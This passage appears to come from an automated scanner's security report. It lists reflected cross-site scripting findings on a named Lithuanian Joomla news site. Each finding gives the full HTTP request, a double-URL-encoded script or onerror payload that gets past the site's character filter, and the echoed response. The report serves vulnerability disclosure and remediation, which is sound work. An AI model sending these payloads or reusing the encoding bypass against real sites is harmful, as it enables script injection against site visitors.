<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/e5a70"><img src=a onerror=alert(1)>f34b3f0f1a5" />
...[SNIP]...

4.1207. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e261bfa3051b was submitted in the REST URL parameter 1. This input was echoed as 77c06"><script>alert(1)</script>261bfa3051b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos77c06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e261bfa3051b/5-pirmasis-joomla-gimtadienis.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos77c06"><script>alert(1)</script>261bfa3051b/5-pirmasis-joomla-gimtadienis.html" />
...[SNIP]...

4.1208. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12fa2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e2d7b242762e was submitted in the REST URL parameter 2. This input was echoed as 12fa2"><img src=a onerror=alert(1)>2d7b242762e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/12fa2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e2d7b242762e HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/12fa2"><img src=a onerror=alert(1)>2d7b242762e" />
...[SNIP]...

4.1209. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5928bb97d6 was submitted in the REST URL parameter 1. This input was echoed as 71a12"><script>alert(1)</script>a5928bb97d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos71a12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5928bb97d6/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:13 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos71a12"><script>alert(1)</script>a5928bb97d6/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html" />
...[SNIP]...

4.1210. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a32%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebb4de7b080c was submitted in the REST URL parameter 2. This input was echoed as 80a32"><img src=a onerror=alert(1)>bb4de7b080c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/80a32%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebb4de7b080c HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:59 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/80a32"><img src=a onerror=alert(1)>bb4de7b080c" />
...[SNIP]...

4.1211. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24b05286a1 was submitted in the REST URL parameter 1. This input was echoed as acb65"><script>alert(1)</script>e24b05286a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienosacb65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24b05286a1/65-joomla-1522-versija-istaiso-saugumo-spraga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:12 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienosacb65"><script>alert(1)</script>e24b05286a1/65-joomla-1522-versija-istaiso-saugumo-spraga.html" />
...[SNIP]...

4.1212. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e877%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efe0b1bcf6c was submitted in the REST URL parameter 2. This input was echoed as 9e877"><img src=a onerror=alert(1)>fe0b1bcf6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/9e877%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efe0b1bcf6c HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:58 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/9e877"><img src=a onerror=alert(1)>fe0b1bcf6c" />
...[SNIP]...

4.1213. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/67-joomla-16-rc1-versija.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad9c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e980e766959d was submitted in the REST URL parameter 1. This input was echoed as ad9c6"><script>alert(1)</script>980e766959d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienosad9c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e980e766959d/67-joomla-16-rc1-versija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:45 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienosad9c6"><script>alert(1)</script>980e766959d/67-joomla-16-rc1-versija.html" />
...[SNIP]...

4.1214. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/67-joomla-16-rc1-versija.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 732e7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253effdce0069 was submitted in the REST URL parameter 2. This input was echoed as 732e7"><img src=a onerror=alert(1)>ffdce0069 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/732e7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253effdce0069 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/732e7"><img src=a onerror=alert(1)>ffdce0069" />
...[SNIP]...

4.1215. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8404e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42b8d45929b was submitted in the REST URL parameter 1. This input was echoed as 8404e"><script>alert(1)</script>42b8d45929b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos8404e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42b8d45929b/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos8404e"><script>alert(1)</script>42b8d45929b/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html" />
...[SNIP]...

4.1216. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f293%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e3dd01bbbb04 was submitted in the REST URL parameter 2. This input was echoed as 7f293"><img src=a onerror=alert(1)>3dd01bbbb04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/7f293%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e3dd01bbbb04 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/7f293"><img src=a onerror=alert(1)>3dd01bbbb04" />
...[SNIP]...

4.1217. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 811dd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63483d0e7d7 was submitted in the REST URL parameter 1. This input was echoed as 811dd"><script>alert(1)</script>63483d0e7d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos811dd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63483d0e7d7/69-lithuanianjoomlacom-atnaujinama.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos811dd"><script>alert(1)</script>63483d0e7d7/69-lithuanianjoomlacom-atnaujinama.html" />
...[SNIP]...

4.1218. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 752f0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee9c9deba8 was submitted in the REST URL parameter 2. This input was echoed as 752f0"><img src=a onerror=alert(1)>e9c9deba8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/752f0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee9c9deba8 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:28 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/752f0"><img src=a onerror=alert(1)>e9c9deba8" />
...[SNIP]...

4.1219. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/70-joomla-16-isleista.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6edcf657b28 was submitted in the REST URL parameter 1. This input was echoed as 1b6f1"><script>alert(1)</script>6edcf657b28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos1b6f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6edcf657b28/70-joomla-16-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos1b6f1"><script>alert(1)</script>6edcf657b28/70-joomla-16-isleista.html" />
...[SNIP]...

4.1220. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/70-joomla-16-isleista.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58a1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0a76c799042 was submitted in the REST URL parameter 2. This input was echoed as a58a1"><img src=a onerror=alert(1)>0a76c799042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/a58a1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0a76c799042 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/a58a1"><img src=a onerror=alert(1)>0a76c799042" />
...[SNIP]...

4.1221. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b70f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1469d13651 was submitted in the REST URL parameter 1. This input was echoed as 4b70f"><script>alert(1)</script>a1469d13651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos4b70f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1469d13651/71-lietuviu-kalba-joomla-16-versijai.html HTTP/1.1
